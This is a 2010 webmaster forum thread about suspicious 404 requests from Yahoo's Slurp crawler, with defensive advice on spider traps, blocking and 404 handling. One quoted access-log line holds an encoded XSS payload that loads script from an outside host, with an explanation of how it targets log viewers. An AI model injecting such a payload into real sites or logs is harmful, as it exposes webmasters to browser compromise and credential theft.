homepage Welcome to WebmasterWorld Guest from
register, free tools, login, search, pro membership, help, library, announcements, recent posts, open posts,
Become a Pro Member
Home / Forums Index / Yahoo / Yahoo Search Engine and Directory
Forum Library, Charter, Moderators: martinibuster

Yahoo Search Engine and Directory Forum

This 34 message thread spans 2 pages: 34 ( [1] 2 > >     
Strange 404s from Yahoo Slurp

 4:54 pm on Jun 14, 2010 (gmt 0)

For the past few months slurp has been generating a lot of 404's. There are 3 types:

* Genuine 404s from pages which were deleted a while ago.
* 404s from what seems to be badly configured software
* 404s from what seems to be attempts at exploits.

The following are 404s from Yahoo sports pages such as blogs and video sections:

404 GET /nhl/blog/YYYYY/teams/Nashville+Predators/nhl.t.27
404 GET /nhl/players/2848/gallery/im:urn:newsml:sports.yahoo,getty:YYYYYY:nhl,photo,YYYYYYYYYYYY_nashville_pre:1
404 GET /nhl/teams/was
404 GET /nhl/teams/cob

My sector is sports but nothing to do with hockey, or US sports of any kind.

If I look at the referring pages there is no link to my site so is this badly configured software?

The following seem to be some kind of exploit:

404 /myHigherEdJobs/Login/
404 /company/contact.cfm
404 /question/index?qid=20100223114447AAUSrnf

myhigheredjobs is I believe a jobsite app which uses a login admin panel. As with the company/contact.cfm and the question/index they are not on my site and they look as if they are trawling for exploits.

The IP address does look genuine:



Non-authoritative answer: name = b3090812.crawl.yahoo.net.

Authoritative answers can be found from:
115.195.67.in-addr.arpa nameserver = ns2.yahoo.com.
115.195.67.in-addr.arpa nameserver = ns3.yahoo.com.
115.195.67.in-addr.arpa nameserver = ns4.yahoo.com.
115.195.67.in-addr.arpa nameserver = ns5.yahoo.com.
115.195.67.in-addr.arpa nameserver = ns1.yahoo.com.
ns1.yahoo.com internet address =
ns2.yahoo.com internet address =
ns3.yahoo.com internet address =
ns4.yahoo.com internet address =
ns5.yahoo.com internet address =

So what the heck is going on here? Is this some kind of spoofing in order to crawl my site to get past current bad bot blocking and / or exploit trawling?

As I said on another thread here slurp is excessively crawling the site. I am wondering if some kind of spoofing is going on and that I should totally block the IP.



 11:48 am on Jun 19, 2010 (gmt 0)

Here's an update.

I opened a ticket with Yahoo webmaster support. I had 2 escalation notices and then a customer support survey request.

A bit disappointed with this. At first it seems Y support were onto something but now silence.

Definitely something not right here. I still get the sports book 404s (which could be Ys mechanism for testing 404 responses - it says that on the webmaster support page).

The exploit trawling looks more worrying though. Could it be that someone has found a way to use serps as a sort of proxy to find sites with potential exploits?


 10:14 pm on Jun 19, 2010 (gmt 0)

I've been seeing yahoo bots forcing 404s as well.

I haven't got the time to waste trying to get any info/response from yahoo. I've pursued mail server problems on two occasions and each time got nowhere. The replies I DID get were pretty much standard boilerplate and my subsequent attempts to get more info/action were not replied to.

I'm used to yahoo's bad behaviour on mail and web servers (very frequent hits on bot IPs with no bot UA, for example).

Basically, if it's a yahoo bot UA on a yahoo bot IP (ie not just any old yahoo IP) then just reject it and don't worry.


 10:35 pm on Jun 19, 2010 (gmt 0)

About a dozen, on two sites - starting on the 17th: - - [18/Jun/2010:00:00:00 -0000] "GET /SlurpConfirm404.htm - - [18/Jun/2010:00:00:00 -0000] "GET /SlurpConfirm404.htm


 12:44 am on Jun 20, 2010 (gmt 0)

SlurpConfirm404 have only just started today. Strange that. None before but 8 within the past 5 hours.

I am seriously considering totally blocking the Yahoo IP range. As I said in the other thread Yahoo is the biggest single crawler / user of the site and yet it brings in a relatively small amount of traffic. The traffic:crawl ratio is minute.

I would like to know if there is some kind of exploit going on though. Why would an IP address assigned to Yahoo be trying to access pages which possibly known exploit pages?


 7:26 pm on Jun 20, 2010 (gmt 0)

If the IP is a bot IP then it's yahoo - I doubt anyone could get an exploit onto it who wasn't yahoo. If it's not a bot IP it is possible that anyone could use it: there are a lot of yahoo proxies and access lines that anyone can use. Same with google and MS.

Some tests may be to see if a site has an open ecommerce point of some kind (or even a virus) but I think slurpconfirm404 is just that: to confirm what action a site is taking when faced with a missing page situation.

Some of my sites always redirect to the home page. Others redirect if a browser is detected (keep visitors on the site) but return a 404 if it's a bot (to please google, really). It's probably that kind of thing yahoo is trying to determine, although what they would do with the info is open to question.

I agree yahoo is the most agressive bot at the moment - always has been, I think. More than MS and Yandex. Far more than google normally crawls and at the moment almost infinitely more - google has almost stopped crawling my sites for the past few weeks: even yellow pages crawls more!


 8:13 pm on Jun 21, 2010 (gmt 0)

Here's another example. This is a Yahoo slurp IP trying to run an external javascript exploit against my site. Note I put example.com instead of the rogue remote site (it is a known defunct exploit .org from 2009). - - [21/Jun/2010:20:59:44 +0100] "GET /%3Csc%3Cscript%20src=http://example.com/x.js%3E%3C/script%3E HTTP/1.0" 500 6029 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; ht tp:/ / help.yahoo.com/help/us/ysearch/slurp)" 0 widgetexample.com "-" "-"

Why, how, who?


 10:47 pm on Jun 21, 2010 (gmt 0)

That is certainly a bot IP. I wonder if someone has that link on a web site somewhere and yahoo is just following the link. The exploit, obviously, whould be perpetrated from the originating web site not from yahoo following it - there would be no point unless yahoo was actually trying to open you up.

If they made up the url then there is a possible case under the Computer Misuse Act (at least in the UK).

Difficult to tell where it originated, though.


 9:32 am on Jun 22, 2010 (gmt 0)

Usually these fishing for exploits attempts come from compromised PCs or servers. They can be dealt with.

If a bot is itself fishing for exploits then there is something seriously wrong with the bot. It has the potential to infect millions of pages.

How do I escalate this?

The Y webmaster customer care sent me 2 'we are escalating this' messages but you can't reply to them.

Good point on the Computer Misuse Act. I will look into this but I also think a bit of tech sites publicity will get something done.


 11:46 am on Jun 22, 2010 (gmt 0)

The following seem to be some kind of exploit:
404 /myHigherEdJobs/Login/
404 /company/contact.cfm
404 /question/index?qid=20100223114447AAUSrnf

Unless there was more code in the request than you posted, those don't have anything in them that could be exploits.

Google and Yahoo both expect sites to return 404 for nonexistent pages. Yahoo tests for it explicitly with its SlurpConfirm404 crawler by requesting pages that it knows are not on your site. If you return a 200 response or redirect to another page that returns a 200, it is considered an attempt to get more pages indexed than you actually have. Handling 404's incorrectly also has the potential of getting you hit with a duplicate content penalty, if the site sends visitors to the same landing page regardless of what nonexistent page was requested. - - [21/Jun/2010:20:59:44 +0100] "GET /%3Csc%3Cscript%20src=http://example.com/x.js%3E%3C/script%3E HTTP/1.0" 500 6029 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; ht tp:/ / help.yahoo.com/help/us/ysearch/slurp)" 0 widgetexample.com "-" "-"

Too bad you can't post what example.com was. That is strange code, but the question is whether example.com was an actually malicious site.

In view of the Google Safe Browsing malicious website database, and Yahoo's equivalent one, it wouldn't surprise me if search engines start crawling sites testing for the existence of vulnerabilities like XSS. I don't know if any are currently doing it, though.

...Others redirect if a browser is detected (keep visitors on the site) but return a 404 if it's a bot (to please google, really).

Google calls that cloaking (giving different results to search engines than to human visitors), and their quality guidelines warn against doing it.

The correct way to handle a nonexistent page is to send a 404 status code. On the 404 page, you can put links to wherever else you want, but it is important not to use any method to redirect automatically.


 3:41 pm on Jun 22, 2010 (gmt 0)

GETs for /myHigherEdJobs/Login/

without payloads are often pre attack attempts. Standard hack trawling to find marks ready for attacking.

the example.com mask was originally

Alpha (C)
Zero (N)
Victor (C)

I still do not understand why Yahoo would even attempt to call a script from that site, on sites which it crawls.

Either they do not know that the site did host bad scripts (google started announcing site warnings, and delisting it in Aug 09), or someone has found a way to piggy back off yahoo serps in order to try and run code on target sites.


 8:21 pm on Jun 22, 2010 (gmt 0)

Steve: Let google call it what they will, I'm giving them NO PAGE not different content. It works fine on my sites.

Frank: I'm still thinking that yahoo is following a link from another web site IF it's a hacking type URL. If your site was once hacked then that could well be a link to your hacked site from a phishing site whose domain etc would almost certainly change at least several times a month as they got detected and canned.

The possibility that yahoo are fishing for phishes is, of course, an option but if the url is trying to PLANT an exploit that's stupid and I don't think they would! It is more likely, if it's not a phishing link but a plant attempt, that the site yahoo got it from is seeding SEs with hacking code: worrying if true, although I haven't seen anyone mention it elsewhere.


 1:15 am on Jun 23, 2010 (gmt 0)

Somewhat disorganized comments based on a longer second look...

"/question/index?qid=20100223114447AAUSrnf" is the URL format of a Yahoo Answers question, and, oddly enough, when plugged into the correct website address of YA, it is a real existing question.

Some "thinking out loud"...

"GET /%3Csc%3Cscript%20src=http://example.com/x.js%3E%3C/script%3E"
decodes to
GET /<sc<script src=http://example.com/x.js></script>

example.com is, as you said, an old exploit site from last summer. That JS code was injected into server pages or databases using various injection techniques, but that code was the injected content. In itself, it's not capable of compromising the server. That was done some other way. Once the code is in the site, its job is to launch browser exploits against people who visit the site.

But the request you found in your log is misguided if it was intended as an attack on the server. The page request itself is for an HTML script tag. An attack on your *server* would have to use something like PHP (a server side language) or SQL, not JavaScript (client side).

Maybe this URL with the JS in it is an attack against you, via statistics software. If a stats program puts that text in a report of pages requested, but fails to properly sanitize HTML tags, then that script could launch the exploit against *you*, just from viewing the page containing the text, and it wouldn't matter what response code the server gave for the request. The point was to get the request into the access log, that's all.

dstiles's suggestion about what could cause a Yahoo bot to make such a request sounds like a strong possibility to me. What if somebody placed in a forum or blog comment somewhere a link to your site, but the link contains that JavaScript code as a cross-site scripting attack? It seems at least conceivable that a crawler might run across the link and innocently follow it.

Maybe try doing web searches to try to find pages with links to your site and also with references to that malicious domain.


 9:34 am on Jun 23, 2010 (gmt 0)

Yes there are 2 main issues here. Just to recap:

Badly Configured Links? / Corrupt Serps?
The first is the sports blog / Q&A crawlings which seem badly configured. This is where pages are asked for on my site which currently exist on the yahoo blogs / Q&A. For some reason Yahoo is asking for pages of it's own blog site on my site: - - [15/Jun/2010:22:07:21 +0100] "GET /nhl/blog/puck_daddy?author=Greg+Wyshynski HTTP/1.0" 404 5110 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; [help.yahoo.com...] 0 mysite com "-" "-"

I can not see why this should be an exploit attempt. And this is not a log file spam attempt either as there is only a local side uri in the GET / and not the full url in the referrer.

Yahoo is asking for one of it's own pages, on my site and this seems like some kind of corruption.

Fishing for Exploits
The second is the hit for exploit pages. These are pages which do not exist on my site, and have never existed on my site, but a hacker will look for in order to determine if a site has a the potential to be hacked if it has a particular app.

Forget the javascript one for now. Look at the /myHigherEdJobs/Login/ crawls.

I am not certain of this but there could be an exploit with that app and that is why pages are being crawled.

Usually potential victim sites are found via serps. e.g. Assume that an older version of an app has a vulnerability. A hacker would attempt to find victims by searching for the app file name, or a version no. or any file in a subdirectory which could indicate the version stored. This can be done with a script to check many sites, or manually via a search engine

search: widgetforum v2.0
search: /widgetforum/adminpanel.php
search: /widgetforum/VERSION.txt

If those are searched for then the serps will return sites which have those pages and a hacker can browse the list in order to choose marks and test the full exploits.

If a hacker wanted to test this against a site he wishes to target directly he would call for those pages on the target site.

e.g. mysite com/widgetforum/adminpanel.php

If that did not produce a 404 then he knows I have that file and will then procede to infiltrate it.

Why does Yahoo ask for the pages?
This is the bit I can not understand. Yahoo is DIRECTLY asking for the exploit pages. It is as if the slurp bot has been configured in some way to search out for key pages.

As I said earlier, hackers can use SEs to find potential sites but the serps will only list sites with the vulnerabilities - they have the pages on the site.

But this is not what is happening here: - - [10/Jun/2010:07:00:12 +0100] "GET /myHigherEdJobs/Login/ HTTP/1.0" 404 5066 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; [help.yahoo.com...] 0 mysite com "-" "-"

In this instance Yahoo crawler is hunting for the page and not the client IP address via serps.

Message Board Posting / Website Page with link to my site
Maybe there is a webpage, or a message board posting out there which has a link to this

mysite com/myHigherEdJobs/Login/

But I can't find any on yahoo or google. I have searched for mysite and the other potential exploit pages (advanced.cfm, alpha zero victor ..) and none are returned.

Besides, what is the point in a link like that being crawled? It would have no advantage for the hacker as he would never know that the slurp crawl would return a 404 or not.

1. Rogue posts on message board :

'Hi .... link: mysite com/myHigherEdJobs/Login/' ... Bye

2. Any human reading that may decide to click the link and they would get a 404. The rogue hosting site would not know this.

3. Yahoo crawls the rogue post and follows the link and receives the 404. The rogue hosting would not know this.

Javascript Injection
This could have been the intention of the alpha zero victor exploit. But again it is not configured correctly. If the intention is to fill log files up with links to rogue sites then surely the referring url should be targetted and not the GET / url.

I will let this run for a few days but soon I will have to ban the slurp IP totally. It is constantly setting off the security app alarms.


 11:17 am on Jun 23, 2010 (gmt 0)

Below is a list of all 404s triggered by Yahoo Slurp for the past month.

/nhl/players/2848/gallery/im:urn:newsml:sports.yahoo,getty:20050301:nhl,photo, 66b88e6b63aad158b2b7cab0c51e0399-getty-97964715jd011_nashville_pre:1
/nhl/players/2848/gallery/im:urn:newsml:sports.yahoo,getty:20050301:nhl,photo, 7afc820fdca02265ceb6878296b3f8d8-getty-97964715jd003_nashville_pre:1
/nhl/players/2848/gallery/im:urn:newsml:sports.yahoo,getty:20050301:nhl,photo, 894633dd97ba4c3007c8b1b37dbd0dd6-getty-98143151fb011_chicago_black:1
/nhl/players/2848/gallery/im:urn:newsml:sports.yahoo,getty:20050301:nhl,photo, a8d32f5ac24a7e6fdc1ed6d6a177f394-getty-98143151fb020_chicago_black:1
/nhl/players/2848/gallery/im:urn:newsml:sports.yahoo,getty:20050301:nhl,photo, d0344384957b703e90969398311b0cda-getty-98143151fb005_chicago_black:1
/nhl/players/2848/gallery/im:urn:newsml:sports.yahoo,getty:20050301:nhl,photo, e18a88be967bd4f20a94547feb64bcd8-getty-97964715jd004_nashville_pre:1
/nhl/players/2848/gallery/im:urn:newsml:sports.yahoo,getty:20050301:nhl,photo, eb868cb0b4c12a6bfe5da63c8884cdb0-getty-98095592jd019_nashville_pre:1
/nhl/players/2848/gallery/im:urn:newsml:sports.yahoo,getty:20050301:nhl, photo,fd1efa98f266aafcda29db0c2fde801b-getty-97964715jd012_nashville_pre:1


 6:03 pm on Jun 23, 2010 (gmt 0)

There is a thin line between exploit trawling and data gathering and I suspect the later is to blame.

By seeing if certain pages exist on your site Slurp is gathering data about what your site is made of, which obviously affects your rankings (or they wouldn't waste resources).

Some of those look like tests to see if your site throws 404 on never existed pages as it should instead of say 301 or 410. Some of those look like they're testing for slurp only doorway pages.

It's not all bad, in fact Slurp wants to know if you have a video player, a top content section, an about page and a company page. Obviously Slurp places value on these things so jump on that free search crawler insight and create them!

Thanks for sharing the list - it looks like Slurp has figured out your site is about sports and wants to know if you feature yahoo.sports and/or getty content... since authority sites likely would mention those two sites perhaps you should too. On the other hand Slurp may be looking to penalize use of those resources... hard to tell. now i'm off to see what Google's been 404'ing on my site.


 6:34 pm on Jun 23, 2010 (gmt 0)

I don't think slurp is doing that.

Many of those URLs are hosted on yahoos own site. Why would it check other sites to see if it has the same pages as yahoo?

The /question/ ... pages are from anwsers.yahoo.com. Paste the 2nd one in the list after answers.yahoo.com and you will see it is a page where some asks for help on how to 'make out'.

Why is that page being asked for on my site?

The video player is from sports.yahoo.com. Check the first one in the list. It is a video of Detroit beating Phoenix 6 - 1

Why is that page being asked for on my site?

As I say, this is not a referral coming to mysite (as if the sports page had a link to my site, or someone on the answers site referenced a page on my site). This is slurp looking for it's own pages on my site and it seems pretty dumb.

As for some of the other pages it is trying to access, well they trip alarms.

If slurp is calling for


and /login pages then this is very suspicious.

Either someone has found a way to infiltrate serps or yahoo is actively seeking pages which may have the potential to be exploitable.


Is anyone else seeing this? I don't know. I am looking for other sites reporting this problem.

Are any other crawlers doing this. No, and never. Google only 404s pages which have expired, or have referred from mis-spelt pages.

Slurp is doing something potential nasty here and I don't like it.


 12:29 am on Jun 24, 2010 (gmt 0)

Yahoo is asking for one of it's own pages, on my site and this seems like some kind of corruption.

The only other reason I could think they might do that would be to search for scraper/mirror sites that are making illegal use of Yahoo's content via 302 redirects. However, a Google inurl: search on a couple of the partial URL strings finds them all to be only at Yahoo; no evident problem with scraper sites. Besides, their normal Slurp crawler would run across those in the normal course of events, anyway, so they'd have no need to actively search for them.

I had 2 escalation notices and then a customer support survey request...At first it seems Y support were onto something but now silence... Definitely something not right here.

Yahoo must get many questions a day about, "Why is Slurp doing [whatever]?", so it seems a bit unusual to me that you got a response at all other than something like "please read our FAQ", and even more unusual that it was escalated. Sudden silence after an initial willingness to be communicative is a fairly typical response of a big company that has found a real problem. Even if you have usefully alerted them to something they need to fix, it would be atypical for them to openly confirm it to you or solicit your further input to help them fix it. More likely, you would just eventually see the errors stop, which is possibly one reason not to block the requests for the time being.


I can think offhand of two different types of exploit trawling. One makes sense, and the other doesn't.

In order to commence a brute force password attack against a login page, you'd need to first find a login page, so it can make sense to crawl sites looking for login pages. But that would only be in preparation for a brute force attack, which will require many requests. And it's not really an exploit against an application vulnerability. [The protection against it is simply to use long random passwords.]

The other type of trawling would be to find vulnerable versions of vulnerable web applications, but I've found such trawling, without an attached payload, to be extremely rare. Given the choice between a) sending out a million requests to websites in order to find the vulnerable ones, and then following up, and b) sending out a million requests WITH the exploit payload, option b) is at least twice as efficient. It will succeed immediately against any vulnerable site, and will simply have no effect against the nonvulnerable ones. Unlike a password attack, an application exploit requires hardly any expenditure of effort. The payload is a single line of code, usually in the query string, usually referencing an outside malicious code-cache site, from where it gets a possibly complex script that carries out the full exploit. All automated, no human effort.

My logs show thousands of exploit attempts launched against web applications that I don't use. The hackers don't care if you use the app or not. Sending the payload outright instead of probe-then-exploit is a time saver.


As an additional precaution, you might check Google Webmaster Tools to ensure that Googlebot is not also under the impression that these URLs might be valid for your site. If Googlebot thinks they might be valid, that would be cause for concern.


I'm basically not convinced that there is any exploit activity going on here, except for the JavaScript attack that looks like a cross-site scripting attack of some sort.

But I am convinced that the fact these requests are coming from Yahoo is weird and possibly indicative of a Yahoo configuration problem, provided you can rule out the possibility that Yahoo might be getting these URLs from some strange source and is simply crawling them in the ordinary course of following links.

Besides, what is the point in a link like that being crawled?

Yes, exactly. Yahoo's crawling those links couldn't help any hacker.


JavaScript injection --
This could have been the intention of the alpha zero victor exploit. But again it is not configured correctly. If the intention is to fill log files up with links to rogue sites then surely the referring url should be targetted and not the GET / url.

Actually, the intent of that wouldn't be to fill the log with links (such as "log spamming", trying to generate backlinks to their site in website logs that the webmasters have made publicly viewable).

Rather, the intent would be to attack the webmaster's browser when the webmaster looks at his/her visitor reports. If a web page has a JavaScript script in it, then when the page loads, the JavaScript runs. The malicious GET request is a way to get their JavaScript embedded in the web page that you look at when you view your visitor reports. You open Webalizer or AWStats, or whatever, and as soon as the page loads, containing the listing of their GET request, the JavaScript runs, fetches its content from alpha zero victor, and bam! your browser is under attack. One of the pieces of the attack is a password-stealer. So if the attack succeeds at infecting your PC, they could potentially obtain your website FTP password.

But it's a low probability attack: a) you must have JavaScript enabled (when viewing your website logs, you probably do), b) The JavaScript itself must be well formed, and, although not an expert at XSS, I'm not sure that that JS is. c) You must be viewing your report on a web page such as Webalizer produces, d) that log application must *fail* to convert characters such as < and > to their HTML entities. Most major log viewers are properly configured to use HTML entities. e) Your browser must be vulnerable to the exploit that is launched against it. f) Your PC must be unpatched and vulnerable to the exploit that is launched against *it*. g) You must not be running real-time antivirus software.

I get other malicious requests that appear to have a similar intent, except that instead of JS, there is PHP code embedded in the referer string, presumably in hopes that the log report page is generated using PHP and that their PHP code snippet will therefore run.


I hope others will report if they are seeing similar strange requests. I definitely have not seen any unusual requests from Yahoo.

Even if you are getting requests for /admin/ or /login/ pages, you are well protected provided that a) your application, whatever it is, is up to date and fully patched so it doesn't have known vulnerabilities, and b) you use long random passwords that would take years, decades, or millenia to crack. In other words, just because you're attacked doesn't mean you're hacked. You definitely will be attacked.


 3:37 am on Jun 24, 2010 (gmt 0)

Other than the bandwidth expended serving a 404, is there really a problem? Hitch up the undies and keep going.

Some things just don't make sense, but if they don't HURT you then ignore...


 8:31 am on Jun 24, 2010 (gmt 0)

That's a lax attitude towards security :-)

Until the reason for the page GETs is known it is a threat and needs to be treated as such.

No-one has ruled out a forged IP, no-one has ruled out a third party infiltration of serps.

It may not be hurting now but it could turn around at any time and bite in the a**.

What if I did have a higheredjobs/login/ page? What if I did have an /admin/ directory? What if they start to crawl for other pages which I do have on the site?

Even if there is no 3rd party exploit attempt here it is still not right. For yahoo to be looking for the same page names as it's own sites pages seems to be a fault and faults should be rectified.

Until I know otherwise this is a threat to my site. I am now pursuing that line of action against Yahoo and it will be up to them to explain why attempts at retrieving sensitive pages on my site are emanating from their IP.


 4:13 pm on Jun 24, 2010 (gmt 0)

I respectfully have to disagree...

sensitive pages

Anything that is considered 'sensitive' should be served only to authenticated users, and preferably over SSL. Any of your content that can be retrieved by the general public, is by definition public.

My advice would be to improve your procedures. Don't blame the bot, there is no security in obscurity...


 5:28 pm on Jun 24, 2010 (gmt 0)

Are we sure this is a bot? Even if it is a bot why does it wish to know if sensitive pages do not, or do exist on a site?

My 'sensitive' pages are secured us much as I can make them. It still doesn't make it right for Yahoo (or a rogue 3rd party) to go tapping the walls to find out where the safe is.

It is sniffing around and I don't like it. It should crawl only the pages it knows about and nothing else.


 10:24 pm on Jun 24, 2010 (gmt 0)

It's a bot. I ran through my "trap" logs this evening and found nine confirm404 hits since 19th June, all from the same IP - one that has a proper crawl rDNS. The same IP actually hit 103 times in all during that period but the other hits were for genuine pages as far as I can tell (haven't checked all of them).

Because of the way my traps work the bot was effectively suspended from accessing any data after the first confirm404 hit, being fed a 403 instead. Still, slurp visits far too frequently anyway. :)


 8:20 am on Jun 25, 2010 (gmt 0)

I disallowed slurp * yesterday at 7am EST, by 3pm EST it had stopped crawling. Nothing crawled since. I think I'll keep it that way. Easier to sleep at night!


 3:46 pm on Jun 25, 2010 (gmt 0)

Turning off ALL of Yahoo's bots? That's one way of approaching the problem! :)


 5:34 pm on Jun 25, 2010 (gmt 0)

In a perfect world

It should crawl only the pages it knows about and nothing else.

But in reality, anything (Yahoo, probably being among the lesser evils) can and will "sniff around." Unless you are able to personally monitor and vet every single access in real time (impossible), I would suggest a more pragmatic and scalable approach. I'd also try to make it more fine-grained than "block all of Yahoo" and include multiple lines of defense.

Here are some examples:

  • Like dstiles, I have a spider trap on my homepages - but the (nofollow) linked file is also disallowed in robots.txt. Well behaved bots avoid the link. The system logs and notifies me of anything that hits the trap. I manually follow up on notifications. Sometimes a trap visit is indicative of a larger problem.

  • Generally speaking there are no files with .php .exe .dll .htm or .txt extensions on my sites. Since I consider this type of probe to be a more direct form of aggression, the follow up more direct.

  • Certain sites are meant for specific markets. A variety of ip ranges (sometimes whole countries and backbones) do not have any legitimate use for the content. These are blocked by default.

  • Malformed user agents indicate a problem on the visitor end or worse (either a misguided enthusiast or trojaned/zombie pc). They're allowed to visit only a subset of 'known good' pages and perform specific actions.

    Implementing a ruleset that is based on whitelisted usage patterns and visitor behavior makes it quite easy to sleep at night :) Obviously, the rules are dynamic and have to be evaluated from time to time, but the result is that I can spend my time on creating content rather than chasing after every single incident...

  • Frank_Rizzo

     6:23 pm on Jun 25, 2010 (gmt 0)

    I don't know what you are trying to state there caribguy. I don't know if what you are saying answers my questions and concerns?

    1. Is it now Yahoo policy to deliberately and pro-actively sniff for admin and login pages.
    2. Has the IP listed above been spoofed
    3. Has someone worked out how to manipulate serps in order to find admin and login pages.

    That's what I am trying to find out here.

    Yahoo not respoding to my emails, and the fact that I can only find 2 or 3 sites with similar concerns over the past 2 years is very worrying indeed.

    Until I get answers Yahoo is going to remain blocked. My loss more than theirs, I know. But I take a zero tolerance approach to anything which goes sniffing for admin pages.


     7:28 pm on Jun 25, 2010 (gmt 0)

    I was suggesting an alternate approach: a more proactive security stance that allows you to worry less about sources of probes and other incidents, which there are many of, and rather focus on a structured way to deal with 'bad behavior' in general (based on what you deem appropriate).

    Naturally, I could be wrong :) In that case I'd be interested to hear what, if anything the Yahooligans have to say...


     8:11 pm on Jun 25, 2010 (gmt 0)

    Frank, I think you should read back several months' worth of the SE forum on this site if you haven't already done so. There is a LOT of info embedded in there, either explicitly or implictly, on how and what to block.

    Yahoo is VERY much a minor irritation compared with some of the very real attacks, scrapes, spams and general scum hits that are around. As caribguy said, concentrating on killing yahoo is missing the point: concentrate on killing scum and yahoo will drop into the trap IF they misbehave, even if their intentions are "honourable". That is precisely what happens on my multi-site server.

    The worst attack I sustained on my server so far this year has been from a bank/creditcard sponsored "security" service. They dragged down my server almost completely for about 45 minutes one night without my permission: the "page urls" they tried were on the lines of the yahoo ones but far more extensive (and yet ultimately stupid and useless as security checks). The server stood up to it because the ("home-made") infrastructure was designed to block such attacks.

    Fix the underpinnings and let yahoo wander at will - until it hits the traps and blocks itself.


     2:20 am on Jun 26, 2010 (gmt 0)

    Some comments... some of it might be useful or interesting:

    No-one has ruled out a forged IP

    If someone sends a request with a forged IP address, they won't get a reply from the server because the reply would go to the IP address they provided - the forged one. A forged-IP attack sent against your site, to serve any useful purpose, would *have* to be sent with the attack payload (it's no use at all for site probing), because the sender would know that they'll get nothing back from a HTTP request that gives a forged IP return address. The attack scenario doesn't seem likely because none of the URLs you listed, except the somewhat lame-looking XSS one, were any types of attack at all.

    On the other hand, this article ( [en.wikipedia.org...] ) describes another use of IP forgery, in denial-of-service attacks. If (a big IF) this is the case in your situation, the attack would be against Yahoo (not you) - by flooding Yahoo with responses to requests that they hadn't sent.

    Your blocking the requests might trivially reduce the amount of data being sent back to Yahoo (if your 403 response is shorter than your 404 response), but not reduce the number of responses. Yahoo will simply receive your 403's instead of your 404's.

    IF this is the case, then your contacting Yahoo at least once was probably a good idea, because otherwise they could think your site was attacking them. Also, if you provided them with the complete requests from your log, they might have been able to check those against the requsts that they actually sent out. If they didn't match, it might, somehow, help them with respect to a DDOS attack underway or planned.

    I disallowed slurp * yesterday at 7am EST, by 3pm EST it had stopped crawling.

    That would seem to suggest that the sender was receiving your responses and adjusted their behavior accordingly. If so, it wasn't IP address spoofing. I guess you can't really be sure they stopped crawling *because* of your ban and not just coincidentally at the same time as the result of your previous contacts with them.

    Or maybe your site was being used in a DDOS attack that was underway, and Yahoo found the source and got the originating server shut down so it's not sending the requests to your site anymore. Once you start trying to analyze scenarios, there can be an overwhelming number of possibilities.


    Login pages can't be classed as sensitive pages. If you live in a home, everybody in the world knows your home has a door. If you use Wordpress, it has an administrator login page with a standardized name. Same for Joomla or any other web application.

    It really doesn't matter if people or crawlers go snooping through your site looking for login pages. If you don't have the login pages they're looking for, there's no harm done. If you do have the login pages they're looking for, your "door" is protected by a super-strong password (right?), and there's still no harm done and no harm possible.

    It still doesn't make it right for Yahoo (or a rogue 3rd party) to go tapping the walls to find out where the safe is.

    As long as you keep the safe locked, it really doesn't matter how much wall tapping goes on, except for the probably small amount of bandwidth used by the 404 responses.

    In the case of Yahoo (and any search engine crawler), it's their job to tap the walls and find out what pages are or are not in a site.

    If you DO have pages (or any files or directories at all) that you DON'T want crawlers to run across, password protect them. Don't list them in robots.txt. Just password protect them.

    Is it now Yahoo policy to deliberately and pro-actively sniff for admin and login pages.

    Yahoo or Google or some other crawler might do that for some reason, such as to create estimates of internet web application usage. They also crawl looking for embedded malware, and probably also for other reasons. They're crawlers, and they make statistical models of the internet, and who knows what else.

    Has someone worked out how to manipulate serps in order to find admin and login pages.

    No. Those can be found by ordinary web searches.

    If those IPs were Yahoo, they got 404 responses indicating that those pages don't exist on your site, which is correct.

    If those IPs were not Yahoo, they got no response at all, and still have no idea whether you have those pages or not. And even if they knew you had them, it wouldn't make any practical difference.

    A scenario not yet mentioned was the possibility that someone hacked the Yahoo crawler server(s) and reprogrammed them to do these requests. My proactive response to that is No. Anyone with the sophistication to do that would have used them for a lot more sophisticated purpose than these lame requests.

    This 34 message thread spans 2 pages: 34 ( [1] 2 > >
    Global Options:
     top home search open messages active posts  

    Home / Forums Index / Yahoo / Yahoo Search Engine and Directory
    rss feed

    All trademarks and copyrights held by respective owners. Member comments are owned by the poster.
    Home ¦ Free Tools ¦ Terms of Service ¦ Privacy Policy ¦ Report Problem ¦ About ¦ Library ¦ Newsletter
    WebmasterWorld is a Developer Shed Community owned by Jim Boykin.
    © Webmaster World 1996-2014 all rights reserved